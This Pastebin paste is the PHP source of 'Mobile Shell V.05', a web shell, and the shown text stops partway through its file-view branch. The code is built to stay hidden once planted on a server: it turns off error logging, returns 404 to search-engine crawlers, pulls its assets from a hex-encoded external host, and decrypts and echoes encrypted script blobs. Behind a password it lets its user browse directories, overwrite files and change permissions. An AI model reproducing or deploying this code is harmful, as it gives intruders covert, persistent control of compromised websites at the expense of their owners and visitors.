Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- <?php
- /*! Description & About
- * Mobile Shell V.05 (4th Edition)
- * Responsive Version
- * Source Viewer With Syntax Highligting
- * Simple Dark Alert
- * Without Log's
- * Clean Url
- * Programmed By Wildan Izzudin
- * Web Shell (c) 2017
- * Underxploit Production (Knowlage Is Jembut)
- * Fix On 03, Dec 2017 (Sunday)
- End !*/
- error_reporting(0);
- // --- pass : underxploit ---//
- $pass = "0bdec2f837ad15748be105faaf60db68";
- $cookie = md5($_SERVER['HTTP_USER_AGENT']);
- if(!isset($_COOKIE[md5($_SERVER['HTTP_HOST'])."-underxploit"])) {
- vb(md5($_SERVER['HTTP_HOST'])."underxploit", $cookie);
- }
- function vb($k, $v) {
- $_COOKIE[$k] = $v;
- setcookie($k, $v);
- }
- $_POST = cl($_POST);
- $_GET = cl($_GET);
- $_COOKIE = cl($_COOKIE);
- $_COEG = array_merge($_POST, $_GET);
- $_COEG = array_map("xp", $_COEG);
- if(isset($_COEG['dir'])) {
- $dir = str_replace("\\", "/", $_COEG['dir']);
- @chdir($dir);
- } else {
- $dir = str_replace("\\", "/", getcwd());
- }
- $dir= str_replace("\\","/", $dir);
- $scdir = explode("/", $dir);
- function cl($arr){
- $quotes_sybase = strtolower(ini_get('magic_quotes_sybase'));
- if(function_exists('get_magic_quotes_gpc') && get_magic_quotes_gpc()){
- if(is_array($arr)){
- foreach($arr as $k=>$v){
- if(is_array($v)) $arr[$k] = cl($v);
- else $arr[$k] = (empty($quotes_sybase) || $quotes_sybase === 'off')? stripslashes($v) : stripslashes(str_replace("\'\'", "\'", $v));
- }
- }
- }
- return $arr;
- }
- function xp($str){
- return (is_array($str))? array_map("rawurldecode", $str):rawurldecode($str);
- }
- function r($r) {
- echo('<script>window.location = "'.$r.'";</script>');
- }
- function failed1($a) {
- echo '<script type="text/javascript">
- $.alert({
- icon: "fa fa-code",
- title: "MOBILE SHELL",
- theme: "Dark",
- content: "'.$a.'",
- type: "red",
- }); </script>';
- }
- function failed2($a) {
- echo '$.alert({
- icon: "fa fa-code",
- title: "MOBILE SHELL",
- theme: "Dark",
- content: "'.$a.'",
- type: "red",
- });';
- }
- function success1($a) {
- echo '<script type="text/javascript">
- $.alert({
- icon: "fa fa-code",
- title: "MOBILE SHELL",
- theme: "Dark",
- content: "'.$a.'",
- type: "green",
- }); </script>';
- }
- function success2($a) {
- echo '$.alert({
- icon: "fa fa-code",
- title: "MOBILE SHELL",
- theme: "Dark",
- type: "green",
- content: "'.$a.'",
- });';
- }
- function fauto1($alert, $window) {
- echo '<script type="text/javascript">
- $.alert({
- icon: "fa fa-code",
- title: "MOBILE SHELL",
- theme: "Dark",
- content: "'.$alert.'",
- type: "red",
- buttons: {
- OK: {
- action: function() {
- window.location = "'.$window.'";
- },
- },
- },
- }); </script>';
- }
- function fauto2($alert, $window) {
- echo '<script type="text/javascript">
- $.alert({
- icon: "fa fa-code",
- title: "MOBILE SHELL",
- theme: "Dark",
- content: "'.$alert.'",
- type: "green",
- buttons: {
- OK: {
- action: function() {
- window.location = "'.$window.'";
- },
- },
- },
- }); </script>';
- }
- function deledir($dirname) {
- if (is_dir($dirname))
- $dir_handle = opendir($dirname);
- if (!$dir_handle)
- return false;
- while($file = readdir($dir_handle)) {
- if ($file != "." && $file != "..") {
- if (!is_dir($dirname."/".$file))
- unlink($dirname."/".$file);
- else
- deledir($dirname.'/'.$file);
- }
- }
- closedir($dir_handle);
- rmdir($dirname);
- return true;
- }
- function a($x17) {
- @define("x13", "\x31\x33\x33\x37", true);
- $x14 = base64_decode($x17);
- $x16s = substr($x14, 0, mcrypt_get_iv_size(MCRYPT_RIJNDAEL_128, MCRYPT_MODE_CBC));
- $x19 = rtrim(
- mcrypt_decrypt(
- MCRYPT_RIJNDAEL_128,
- hash('sha256', x13, true),
- substr($x14, mcrypt_get_iv_size(MCRYPT_RIJNDAEL_128, MCRYPT_MODE_CBC)), MCRYPT_MODE_CBC, $x16s), "\0");
- return $x19;
- }
- function x($b) {
- $c = a($b);
- return $c;
- }
- @session_start();
- @error_reporting(0);
- @ini_set('error_log',NULL);
- @ini_set('log_errors',0);
- @ini_set('html_errors',0);
- @ini_set('max_execution_time',0);
- @ini_set('output_buffering',0);
- @ini_set('file_uploads',1);
- @set_time_limit(0);
- @clearstatcache();
- @define("sec", $pass, true);
- @define("x4", "\x68\x74\x74\x70\x3a\x2f\x2f\x63\x64\x6e\x73\x2e\x78\x74\x67\x65\x6d\x2e\x63\x6f\x6d\x2f\x63\x6f\x64\x65", true);
- if(get_magic_quotes_gpc()) {
- function stripslashes_array($array) {
- return is_array($array) ? array_map('stripslashes_array', $array) : stripslashes($array);
- }
- $_COEG = stripslashes_array($_COEG);
- $_COOKIE = stripslashes_array($_COOKIE);
- }
- if(!empty(sec)) {
- if(isset($_COEG['pass']) && (md5($_COEG['pass']) == sec)) vb(md5($_SERVER['HTTP_HOST']), sec);
- if(!isset($_COOKIE[md5($_SERVER['HTTP_HOST'])]) || ($_COOKIE[md5($_SERVER['HTTP_HOST'])] != sec))
- login();
- } else { echo '<script>alert("d")</script>'; }
- function login() {
- if(!empty($_SERVER['HTTP_USER_AGENT'])) {
- $userAgents = array("Google", "Slurp", "MSNBot", "ia_archiver", "Yandex", "Rambler");
- if(preg_match('/' . implode('|', $userAgents) . '/i', $_SERVER['HTTP_USER_AGENT'])) {
- header('HTTP/1.0 404 Not Found');
- exit;
- }
- } die('<!DOCTYPE html><html><head>
- <title>LOGIN | MOBILE SHELL V.05</title>
- <meta name="robots" content="noindex, nofollow, noarchive">
- <meta name="viewport" content="width=device-width, initial-scale=1">
- <link rel="icon" href="'.x4.'/favicon.ico" type="image/x-icon" />
- <meta property="og:image" content="https://1.bp.blogspot.com/-BcG4JeX2z6Q/WVYTMixgLvI/AAAAAAAAAmk/PBjmcF02SWgoiP-KcxvWq6QVDV2DACi0QCLcBGAs/s320/PicsArt_06-30-03.52.49.jpg">
- <meta name="theme-color" content="#222">
- <meta name="apple-mobile-web-app-capable" content="yes">
- <meta name="apple-mobile-web-app-status-bar-style" content="#222">
- <meta name="msapplication-navbutton-color" content="#222">
- <meta name="author" content="WILDAN IZZUDIN">
- <link href="http://fonts.googleapis.com/css?family=Iceland" rel="stylesheet" type="text/css">
- <script src="'.x4.'/bundled.js"></script>
- <script type="text/javascript" src="'.x4.'/jquery-confirm.js"></script>
- <link rel="stylesheet" href="https://maxcdn.bootstrapcdn.com/font-awesome/4.7.0/css/font-awesome.min.css
- "/>
- <link rel="stylesheet" href="https://fonts.googleapis.com/css?family=Iceland"/>
- <link rel="stylesheet" href="'.x4.'/style.css"/>
- <link rel="stylesheet" href="'.x4.'/jquery.min.css"/>
- <link rel="stylesheet" type="text/css" href="'.x4.'/jquery-confirm.css"/>
- <script>
- baseUrl = window.location.href.split("?")[0];
- window.history.pushState("name", "?", baseUrl);</script>
- </head><body>
- <div class="login-kepala">
- <div class="login-container">
- <script>function login(){
- if(document.getElementById("password").value == ""){
- $.alert ({
- icon: "fa fa-code",
- title: "MOBILE SHELL",
- content: "You Know Password For This Shell ??",
- theme: "Dark",
- buttons: {
- YES: {
- action: function() {
- $.alert ({
- icon: "fa fa-code",
- title: "MOBILE SHELL",
- content: "Please Enter Your Password !!",
- theme: "Dark",
- });
- },
- },
- NO: {
- action: function() {
- $.alert ({
- icon: "fa fa-code",
- title: "MOBILE SHELL",
- content: "You Are Motherfuck\'n Tolol !!",
- theme: "Dark",
- });
- },
- },
- },
- });
- return false;
- }
- document.getElementById("sks").submit();
- }
- </script>
- <form action="" method="post">
- <table><td align="center" style="width:10%">
- <i class="fa fa-bug"></i></td>
- <td style="width:70%"><input type="password" name="pass" id="password" style="padding:7px">
- </td>
- <td style="text-align:right;width:20%"><button type="submit" class="btn-exe" onClick="login(); return false;"><i class="fa fa-sign-in"></i></button></td></table></form></div></div>
- </body></html>');
- } ?>
- <?php
- define("x1", "\x4d\x4f\x42\x49\x4c\x45\x20\x53\x48\x45\x4c\x4c", true);
- define("x2", "\x56\x2e\x30\x35", true);
- define("x3", "\x57\x49\x4c\x44\x41\x4e\x20\x49\x5a\x5a\x55\x44\x49\x4e", true);
- define("x4", "\x68\x74\x74\x70\x3a\x2f\x2f\x63\x64\x6e\x73\x2e\x78\x74\x67\x65\x6d\x2e\x63\x6f\x6d\x2f\x63\x6f\x64\x65", true);
- define("x5", "\x64\x69\x72\x3d", true);
- define("x6", "\x66\x69\x6c\x65\x3d", true);
- define("x7", "\x63\x6f\x6d\x6d\x61\x6e\x64\x3d", true);
- define("x8", "\x3c\x64\x69\x76\x20\x63\x6c\x61\x73\x73\x3d\x27\x63\x6f\x4c\x2d\x70\x61\x6e\x65\x6c\x27\x3e\x3c\x74\x61\x62\x6c\x65\x3e\x0d\x0a\x3c\x74\x64\x20\x63\x6c\x61\x73\x73\x3d\x27\x74\x64\x2d\x70\x61\x6e\x65\x6c\x27\x3e\x3c\x69\x20\x63\x6c\x61\x73\x73\x3d\x27\x66\x61\x20\x66\x61\x2d\x63\x6f\x64\x65\x27\x3e\x3c\x2f\x69\x3e\x3c\x2f\x74\x64\x3e\x3c\x74\x64\x20\x63\x6c\x61\x73\x73\x3d\x27\x74\x64\x2d\x70\x61\x6e\x65\x6c\x2d\x72\x69\x67\x68\x74\x27\x3e\x45\x52\x52\x4f\x52\x3c\x2f\x74\x64\x3e\x3c\x2f\x74\x61\x62\x6c\x65\x3e\x3c\x2f\x64\x69\x76\x3e\x3c\x64\x69\x76\x20\x63\x6c\x61\x73\x73\x3d\x27\x63\x6f\x4c\x2d\x6f\x70\x74\x69\x6f\x6e\x20\x74\x6f\x70\x27\x3e\x3c\x62\x72\x3e\x3c\x62\x72\x3e\x3c\x62\x72\x3e\x3c\x63\x65\x6e\x74\x65\x72\x3e\x3c\x69\x20\x63\x6c\x61\x73\x73\x3d\x27\x66\x61\x20\x66\x61\x2d\x67\x65\x61\x72\x20\x66\x61\x2d\x33\x78\x20\x66\x61\x2d\x73\x70\x69\x6e\x27\x3e\x3c\x2f\x69\x3e\x3c\x62\x72\x3e\x3c\x62\x72\x3e\x5b\x20\x42\x41\x44\x20\x52\x45\x51\x55\x45\x53\x54\x20\x5d\x3c\x2f\x63\x65\x6e\x74\x65\x72\x3e\x3c\x62\x72\x3e\x3c\x62\x72\x3e\x3c\x62\x72\x3e\x3c\x62\x72\x3e\x3c\x2f\x64\x69\x76\x3e", true);
- define("x9", "\x3c\x64\x69\x76\x20\x63\x6c\x61\x73\x73\x3d\x27\x63\x6f\x4c\x2d\x6f\x70\x74\x69\x6f\x6e\x20\x74\x6f\x70\x27\x3e\x3c\x62\x72\x3e\x3c\x62\x72\x3e\x3c\x62\x72\x3e\x3c\x63\x65\x6e\x74\x65\x72\x3e\x3c\x69\x20\x63\x6c\x61\x73\x73\x3d\x27\x66\x61\x20\x66\x61\x2d\x67\x65\x61\x72\x20\x66\x61\x2d\x33\x78\x20\x66\x61\x2d\x73\x70\x69\x6e\x27\x3e\x3c\x2f\x69\x3e\x3c\x62\x72\x3e\x3c\x62\x72\x3e\x5b\x20\x42\x41\x44\x20\x52\x45\x51\x55\x45\x53\x54\x20\x5d\x3c\x2f\x63\x65\x6e\x74\x65\x72\x3e\x3c\x62\x72\x3e\x3c\x62\x72\x3e\x3c\x62\x72\x3e\x3c\x62\x72\x3e\x3c\x2f\x64\x69\x76\x3e", true);
- define("x10", "\x3c\x64\x69\x76\x20\x63\x6c\x61\x73\x73\x3d\x27\x63\x6f\x4c\x2d\x70\x61\x6e\x65\x6c\x27\x3e\x3c\x74\x61\x62\x6c\x65\x3e\x0d\x0a\x3c\x74\x64\x20\x63\x6c\x61\x73\x73\x3d\x27\x74\x64\x2d\x70\x61\x6e\x65\x6c\x27\x3e\x3c\x69\x20\x63\x6c\x61\x73\x73\x3d\x27\x66\x61\x20\x66\x61\x2d\x63\x6f\x64\x65\x27\x3e\x3c\x2f\x69\x3e\x3c\x2f\x74\x64\x3e\x3c\x74\x64\x20\x63\x6c\x61\x73\x73\x3d\x27\x74\x64\x2d\x70\x61\x6e\x65\x6c\x2d\x72\x69\x67\x68\x74\x27\x3e\x53\x55\x43\x43\x45\x53\x53\x3c\x2f\x74\x64\x3e\x3c\x2f\x74\x61\x62\x6c\x65\x3e\x3c\x2f\x64\x69\x76\x3e\x3c\x64\x69\x76\x20\x63\x6c\x61\x73\x73\x3d\x27\x63\x6f\x4c\x2d\x6f\x70\x74\x69\x6f\x6e\x20\x74\x6f\x70\x27\x3e\x3c\x62\x72\x3e\x3c\x62\x72\x3e\x3c\x62\x72\x3e\x3c\x63\x65\x6e\x74\x65\x72\x3e\x3c\x69\x20\x63\x6c\x61\x73\x73\x3d\x27\x66\x61\x20\x66\x61\x2d\x67\x65\x61\x72\x20\x66\x61\x2d\x33\x78\x20\x66\x61\x2d\x73\x70\x69\x6e\x27\x3e\x3c\x2f\x69\x3e\x3c\x62\x72\x3e\x3c\x62\x72\x3e\x5b\x20\x52\x45\x51\x55\x45\x53\x54\x20\x4f\x4b\x20\x5d\x3c\x2f\x63\x65\x6e\x74\x65\x72\x3e\x3c\x62\x72\x3e\x3c\x62\x72\x3e\x3c\x62\x72\x3e\x3c\x62\x72\x3e\x3c\x2f\x64\x69\x76\x3e", true);
- define("x11", "\x3c\x64\x69\x76\x20\x63\x6c\x61\x73\x73\x3d\x27\x63\x6f\x4c\x2d\x6f\x70\x74\x69\x6f\x6e\x20\x74\x6f\x70\x27\x3e\x3c\x62\x72\x3e\x3c\x62\x72\x3e\x3c\x62\x72\x3e\x3c\x63\x65\x6e\x74\x65\x72\x3e\x3c\x69\x20\x63\x6c\x61\x73\x73\x3d\x27\x66\x61\x20\x66\x61\x2d\x67\x65\x61\x72\x20\x66\x61\x2d\x33\x78\x20\x66\x61\x2d\x73\x70\x69\x6e\x27\x3e\x3c\x2f\x69\x3e\x3c\x62\x72\x3e\x3c\x62\x72\x3e\x5b\x20\x52\x45\x51\x55\x45\x53\x54\x20\x4f\x4b\x20\x5d\x3c\x2f\x63\x65\x6e\x74\x65\x72\x3e\x3c\x62\x72\x3e\x3c\x62\x72\x3e\x3c\x62\x72\x3e\x3c\x62\x72\x3e\x3c\x2f\x64\x69\x76\x3e", true);
- error_reporting(0);
- error_log(0);
- @ini_set('error_log',NULL);
- @ini_set('log_errors',0);
- @ini_set('max_execution_time',0);
- @set_time_limit(0);
- echo('<!DOCTYPE HTML>
- <html lang="id">
- <head><title>'.x1.' '.x2.'</title>
- <meta name="viewport" content="width=device-width, initial-scale=1, user-scalable=no">
- <meta name="theme-color" content="#222">
- <link rel="icon" href="'.x4.'/favicon.ico" type="image/x-icon" />');
- echo('<script>
- baseUrl = window.location.href.split("?")[0];
- window.history.pushState("name", "?", baseUrl);</script>');
- echo('<script src="'.x4.'/bundled.js"></script>
- <script type="text/javascript" src="'.x4.'/jquery-confirm.js"></script>
- <link rel="stylesheet" href="https://maxcdn.bootstrapcdn.com/font-awesome/4.7.0/css/font-awesome.min.css
- "/>
- <link rel="stylesheet" href="https://fonts.googleapis.com/css?family=Iceland"/>
- <link rel="stylesheet" href="'.x4.'/style.css"/>
- <link rel="stylesheet" href="'.x4.'/jquery.min.css"/>
- <link rel="stylesheet" type="text/css" href="'.x4.'/jquery-confirm.css"/>');
- echo(x("\x61\x32\x6d\x6a\x70\x46\x67\x59\x75\x67\x49\x75\x4b\x41\x66\x68\x43\x50\x45\x45\x37\x59\x5a\x66\x51\x76\x4f\x32\x32\x5a\x4e\x31\x69\x56\x4d\x67\x4f\x2f\x6a\x47\x6b\x57\x54\x6a\x43\x65\x48\x46\x51\x79\x4d\x49\x72\x6c\x34\x34\x79\x4f\x76\x4f\x4a\x6b\x79\x4e\x79\x38\x6e\x4c\x6c\x48\x37\x2b\x6f\x48\x76\x6a\x78\x63\x34\x65\x51\x58\x2b\x68\x7a\x45\x50\x39\x7a\x6c\x6f\x76\x56\x42\x73\x7a\x6d\x45\x2b\x71\x6f\x4d\x52\x35\x44\x4c\x6a\x4f\x56\x73\x6f\x39\x48\x75\x4f\x54\x4a\x35\x6e\x37\x4e\x49\x4a\x73\x46\x37\x6f\x69\x38\x74\x4e\x5a\x42\x57\x41\x67\x6e\x4b\x4f\x66\x4c\x53\x43\x61\x4e\x77\x6d\x48\x2f\x43\x55\x66\x2b\x59\x64\x43\x2f\x6a\x58\x31\x64\x78\x68\x38\x33\x54\x41\x52\x61\x31\x62\x62\x75\x39\x2b\x38\x68\x2f\x79\x51\x77\x45\x68\x76\x59\x37\x43\x39\x6a\x64\x6f\x47\x32\x59\x4c\x59\x57\x74\x6f\x6c\x4a\x39\x54\x42\x65\x61\x31\x32\x38\x6d\x33\x4c\x4e\x36\x54\x64\x79\x6f\x57\x6d\x53\x77\x6b\x78\x42\x47\x38\x68\x79\x6d\x66\x36\x6e\x35\x6a\x62\x4a\x69\x34\x74\x46\x50\x6a\x4a\x68\x42\x77\x49\x6b\x45\x38\x30\x4c\x61\x4b\x7a\x6c\x42\x37\x4b\x68\x50\x5a\x4d\x5a\x59\x58\x6c\x75\x6c\x6b\x32\x57\x50\x44\x2f\x76\x4e\x4e\x4b\x37\x77\x51\x6b\x70\x62\x59\x65\x66\x6c\x44\x35\x49\x6c\x49\x54\x57\x72\x55\x3d"));
- echo('<i class="fa fa-chevron-up move-top"></i>');
- echo('<script>
- jQuery(document).ready(function() {
- var offset = 220;
- var duration = 500;
- jQuery(window).scroll(function() {
- if (jQuery(this).scrollTop() > offset) {
- jQuery(\'.move-top\').fadeIn(duration);
- } else {
- jQuery(\'.move-top\').fadeOut(duration);
- }
- });
- jQuery(\'.move-top\').click(function(event) {
- event.preventDefault();
- jQuery(\'html, body\').animate({scrollTop: 0}, duration);
- return false;
- })
- });
- </script>');
- echo(x("\x78\x4a\x59\x63\x6f\x52\x6a\x66\x50\x62\x37\x79\x58\x51\x34\x4f\x43\x6a\x6d\x75\x76\x4a\x41\x44\x59\x63\x34\x78\x37\x6b\x65\x49\x30\x58\x4e\x70\x33\x31\x56\x78\x34\x72\x52\x4c\x69\x68\x4b\x50\x64\x4d\x64\x37\x62\x6f\x4f\x39\x71\x42\x47\x4b\x78\x50\x63\x58\x4a\x2f\x6c\x71\x44\x2b\x75\x6d\x63\x76\x6e\x6b\x65\x4a\x55\x50\x4d\x4b\x43\x48\x74\x61\x59\x49\x4c\x51\x77\x45\x6f\x46\x52\x32\x4c\x46\x4b\x6d\x63\x69\x48\x57\x69\x58\x76\x55\x30\x69\x4d\x76\x44\x43\x73\x57\x32\x76\x4d\x7a\x66\x45\x4a\x76\x74\x33\x43\x6b\x71\x68\x6d\x31\x74\x6a\x70\x6a\x76\x43\x61\x34\x2b\x51\x62\x6f\x76\x76\x2b\x2b\x33\x55\x65\x46\x55\x62\x4b\x4d\x69\x55\x4f\x6d\x53\x4b\x53\x69\x6d\x4d\x6a\x41\x6c\x35\x34\x79\x56\x42\x62\x69\x45\x63\x61\x75\x39\x38\x4a\x4a\x30\x49\x54\x45\x33\x65\x41\x49\x61\x71\x7a\x33\x4a\x57\x6a\x53\x65\x67\x42\x6c\x71\x47\x33\x52\x75\x4a\x35\x46\x70\x42\x5a\x35\x36\x34\x6f\x43\x4b\x55\x56\x54\x70\x44\x42\x70\x49\x39\x49\x5a\x39\x73\x2b\x61\x56\x72\x56\x47\x4d\x2b\x6c\x61\x4c\x4f\x71\x30\x6a\x48\x34\x44\x73\x30\x77\x48\x30\x41\x4a\x68\x41\x46\x2b\x44\x45\x71\x33\x46\x6d\x36\x5a\x42\x75\x6e\x70\x67\x69\x35\x42\x30\x5a\x4e\x51\x36\x31\x6a\x39\x71\x74\x75\x57\x49\x64\x2f\x2b\x74\x75\x73\x53\x7a\x6e\x5a\x65\x33\x50\x6a\x4b\x30\x51\x58\x6b\x48\x4c\x35\x67\x35\x5a\x38\x65\x4d\x65\x4f\x31\x58\x59\x54\x56\x6b\x43\x64\x78\x65\x67\x2b\x70\x69\x54\x44\x5a\x47\x30\x41\x77\x6b\x44\x32\x2f\x6d\x4e\x58\x6a\x50\x6e\x62\x55\x58\x4d\x67\x74\x61\x4f\x35\x57\x34\x77\x42\x73\x59\x6c\x34\x69\x6c\x55\x42\x77\x78\x6d\x30\x77\x73\x44\x38\x78\x32\x73\x4c\x35\x45\x54\x6b\x67\x48\x41\x48\x5a\x71\x48\x2b\x63\x42\x48\x75\x4e\x65\x4a\x44\x48\x57\x4f\x61\x38\x71\x4b\x41\x6f\x55\x64\x4c\x52\x77\x64\x78\x68\x48\x52\x79\x43\x77\x71\x44\x36\x71\x53\x6c\x32\x59\x4e\x75\x57\x39\x2b\x36\x41\x79\x7a\x61\x76\x6a\x31\x59\x4d\x57\x67\x35\x33\x73\x31\x6b\x68\x30\x4b\x71\x4e\x35\x79\x54\x64\x38\x43\x62\x78\x45\x55\x58\x48\x38\x48\x49\x76\x66\x35\x6c\x46\x59\x35\x76\x71\x63\x64\x74\x39\x55\x4e\x4e\x66\x72\x66\x30\x57\x5a\x42\x78\x39\x4e\x38\x6b\x78\x67\x38\x75\x79\x71\x78\x52\x36\x37\x59\x6b\x4b\x43\x61\x38\x31\x4f\x71\x68\x4d\x7a\x37\x37\x4d\x4b\x65\x6e\x35\x62\x4a\x66\x58\x42\x48\x63\x54\x51\x41\x79\x6f\x56\x71\x72\x4d\x70\x50\x6f\x5a\x47\x55\x6d\x4d\x71\x42\x31\x6f\x6b\x6c\x78\x49\x47\x72\x72\x4a\x56\x56\x71\x31\x6a\x49\x4d\x70\x38\x46\x42\x41\x39\x76\x42\x4d\x37\x57\x76\x43\x75\x74\x63\x4b\x73\x6d\x6b\x77\x30\x57\x47\x68\x45\x52\x6d\x6f\x69\x6b\x45\x50\x4a\x39\x42\x2f\x74\x54\x6d\x54\x6b\x6b\x4a\x64\x76\x49\x31\x63\x65\x67\x74\x67\x39\x5a\x47\x32\x71\x53\x66\x31\x71\x2f\x2f\x68\x44\x59\x2b\x4d\x42\x49\x37\x50\x49\x47\x43\x69\x53\x6e\x58\x53\x79\x46\x67\x76\x67\x57\x78\x5a\x53\x64\x42\x43\x74\x37\x4c\x73\x66\x31\x34\x37\x55\x39\x4c\x72\x37\x56\x4b\x61\x61\x79\x47\x47\x47\x61\x6b\x63\x37\x78\x58\x75\x73\x55\x78\x6c\x42\x4f\x36\x2f\x4d\x66\x76\x69\x2f\x65\x53\x69\x64\x52\x49\x6f\x77\x72\x65\x6c\x47\x73\x76\x4b\x62\x72\x43\x54\x30\x71\x34\x58\x49\x36\x69\x7a\x72\x6a\x31\x66\x62\x31\x76\x31\x78\x55\x61\x32\x67\x4b\x32\x47\x4b\x67\x54\x70\x39\x45\x4f\x35\x30\x52\x50\x77\x52\x41\x61\x75\x58\x62\x78\x75\x52\x4b\x44\x38\x6d\x51\x39\x41\x55\x6e\x6f\x63\x31\x46\x4f\x76\x5a\x6d\x6b\x4c\x56\x39\x77\x62\x65\x47\x39\x4b\x6e\x46\x32\x4a\x6d\x72\x47\x4f\x39\x6c\x31\x35\x44\x52\x65\x76\x52\x55\x4f\x6f\x61\x6a\x61\x7a\x65\x5a\x33\x68\x54\x45\x6f\x48\x77\x52\x38\x5a\x4e\x4a\x4d\x65\x66\x73\x57\x4e\x57\x76\x37\x6c\x45\x2b\x50\x37\x44\x55\x73\x65\x61\x41\x76\x36\x2f\x54\x68\x41\x62\x37\x51\x73\x4e\x57\x49\x44\x41\x58\x79\x51\x39\x68\x51\x62\x2f\x7a\x35\x68\x34\x5a\x4f\x64\x56\x44\x51\x31\x34\x58\x32\x42\x47\x41\x30\x77\x70\x49\x53\x37\x49\x68\x50\x71\x47\x4b\x4f\x45\x6f\x6b\x4d\x4f\x61\x7a\x45\x35\x46\x37\x6e\x63\x32\x41\x78\x39\x58\x79\x4b\x51\x61\x68\x73\x43\x74\x6b\x50\x43\x65\x65\x32\x4c\x65\x44\x6b\x55\x7a\x4d\x75\x58\x65\x54\x72\x54\x75\x77\x32\x48\x6c\x70\x36\x52\x74\x45\x38\x4d\x58\x62\x6e\x66\x4d\x4c\x32\x79\x76\x69\x51\x3d\x3d"));
- echo('<script src="//cdnjs.cloudflare.com/ajax/libs/highlight.js/9.12.0/highlight.min.js"></script>
- <script>hljs.initHighlightingOnLoad();</script>');
- echo('</head><body>');
- echo('<div class="kepala"><div class="co-ontainer"><table><td style="width:25px">
- <i class="fa fa-code"></td><td>
- '.x1.' '.x2.'</td><td style="text-align:right;width:50px"><i class="fa fa-navicon" onClick="ex(1000)"></i></td></table></div></div><div class="co-ontainer-2">
- <div class="cover">
- <table>
- <th><a href="'.$_SERVER['PHP_SELF'].'"><button class="btn-nav">HOME</button></a></th>
- <th><a href="?'.x5.getcwd().'&'.x7.'about"><button class="btn-nav">ABOUT</button></a></th>
- <th><a href="?'.x5.'&'.x7.'logout"><button class="btn-nav">LOG\'T</button></a></th></table></div>');
- echo'<div class="dir">
- <table style="width:100%">
- <td style="width:100%"><div class="dir-pallet"><table><td class="dir-td-left"><font color="#1D9D73">ROOT</font> :</td><td class="dir-td-right break wrap">';
- foreach($scdir as $c_dir => $cdir) {
- echo "<a class='a' href='?dir=";
- for($i = 0; $i <= $c_dir; $i++) {
- echo $scdir[$i];
- if($i != $c_dir) {
- echo "/";
- }
- }
- echo "'>$cdir</a>/";
- }
- echo '</td></table></div></th></table></div>';
- $filez = basename($_COEG['file']);
- $size = filesize("$dir/$filez")/1024;
- $size = round($size,3);
- if($size > 1024) {
- $size = round($size/1024,2). ' MB';
- } else {
- $size = $size. ' KB';
- }
- echo('<div class="coL">');
- // --- chmod file --- //
- if($_COEG['command'] == 'chmod') {
- if(isset($_COEG['perm'])) {
- if(chmod($_COEG['file'],$_COEG['perm'])) {
- $q1 = 'Change Permission Done !!';
- $t1 = '?'.x7.'chmod&'.x5.$dir;
- success1($alert);
- } else {
- $q1 = 'Permission Denied !!';
- failed1($q1);
- }
- }
- echo '<div class="coL-panel"><table>
- <td class="td-panel"><i class="fa fa-code"></i></td><td class="td-panel-right">CHMOD FILE</td></table></div>';
- echo '<div class="coL-option"><table><td align="center" style="width:30px"><i class="fa fa-file-o"></i> </td><td class="break"><font color="#FF000">[</font> '.basename($_COEG['file']).' <font color="#FF000">]</font></td><td style="width:90px" class="coL-option-panel" align="center">'.$size.'</td></table>
- <hr><table>';
- echo "<th><a href='?command=view&dir=$dir&file=".$_COEG['file']."'><button class='coL-btn-option'><i class='fa fa-eye'></i></button></a></th>
- <th><a href='?command=edit&dir=$dir&file=".$_COEG['file']."'><button class='coL-btn-option'><i class='fa fa-pencil'></i></button></a></th>
- <th><a href='?command=rename&dir=$dir&file=".$_COEG['file']."'><button class='coL-btn-option'><i class='fa fa-edit'></i></button></a></th>
- <th><button class='coL-btn-option-active'><i class='fa fa-cogs'></i></button></th>
- <th><a href='?command=delete&dir=$dir&file=".$_COEG['file']."'><button class='coL-btn-option'><i class='fa fa-trash'></i></button></a></th></table></div>";
- echo "<div class='coL-option top'>
- <br><br><br>
- <center>
- <i class='fa fa-file-o fa-3x'></i></center><br><br>";
- echo "<form action='?".x7."chmod&".x5.$dir."&".x6.$_COEG['file']."' style='margin:0px' method='post'>
- <table cellspacing='0'>
- <td align='center' style='width:10%'><i class='fa fa-file-o'></i> </td><td style='width:70%'>
- <input type='text' value='".substr(sprintf("%o", fileperms($_COEG['file'])), -4)."' name='perm' style='width:100%'>
- <input type='hidden' name='path' value='".$_COEG['file']."'></td><td style='width:20%'>
- <button type='submit' class='btn-exe'><i class='fa fa-arrow-circle-right'></i></button></td></table>
- </form></div>";
- }
- // --- edit file --- //
- elseif($_COEG['command'] == 'edit') {
- if($_COEG['save']) {
- $save = file_put_contents($_COEG['file'], $_COEG['src']);
- if($save) {
- $q1 = 'Source Saved !!';
- success1($q1);
- } else {
- $q1 = 'Permission Denied !!';
- failed1($q1);
- }
- }
- echo '<div class="coL-panel"><table>
- <td class="td-panel"><i class="fa fa-code"></i></td><td class="td-panel-right">EDIT FILE</td></table></div>';
- echo '<div class="coL-option">
- <table><td align="center" style="width:30px"><i class="fa fa-file-o"></i> </td><td class="break"><font color="#FF000">[</font> '.basename($_COEG['file']).' <font color="#FF000">]</font></td><td style="width:90px" class="coL-option-panel" align="center">'.$size.'</td></table>
- <hr><table>';
- echo "<th><a href='?command=view&dir=$dir&file=".$_COEG['file']."'><button class='coL-btn-option'><i class='fa fa-eye'></i></button></a></th>
- <th><button class='coL-btn-option-active'><i class='fa fa-pencil'></i></button></th>
- <th><a href='?command=rename&dir=$dir&file=".$_COEG['file']."'><button class='coL-btn-option'><i class='fa fa-edit'></i></button></a></th>
- <th><a href='?command=chmod&dir=$dir&file=".$_COEG['file']."'><button class='coL-btn-option'><i class='fa fa-cogs'></i></button></a></th>
- <th><a href='?command=delete&dir=$dir&file=".$_COEG['file']."'><button class='coL-btn-option'><i class='fa fa-trash'></i></button></a></th></table></div>";
- $source = htmlspecialchars(@file_get_contents($_COEG['file']));
- if(empty($source)) {
- echo "<form method='post' action='?".x7."edit&".x5.$dir."&".x6.$_COEG['file']."' style='margin:0px'>
- <textarea name='src' placeholder='# Put your code here...' class='top'></textarea><br>
- <input type='submit' class='btn-exe' value='Save' name='save' style='margin-top:3px;width: 100%'></form>";
- } else { echo "<form method='post' action='?".x7."edit&".x5.$dir."&".x6.$_COEG['file']."' style='margin:0px'>
- <textarea name='src' class='top'>".$source."</textarea>
- <input type='submit' value='Save' name='save' class='btn-exe' style='margin-top:3px;width: 100%'></form>";
- }
- }
- // --- view file --- //
- elseif($_COEG['command'] == 'view') {
- echo '<div class="coL-panel"><table>
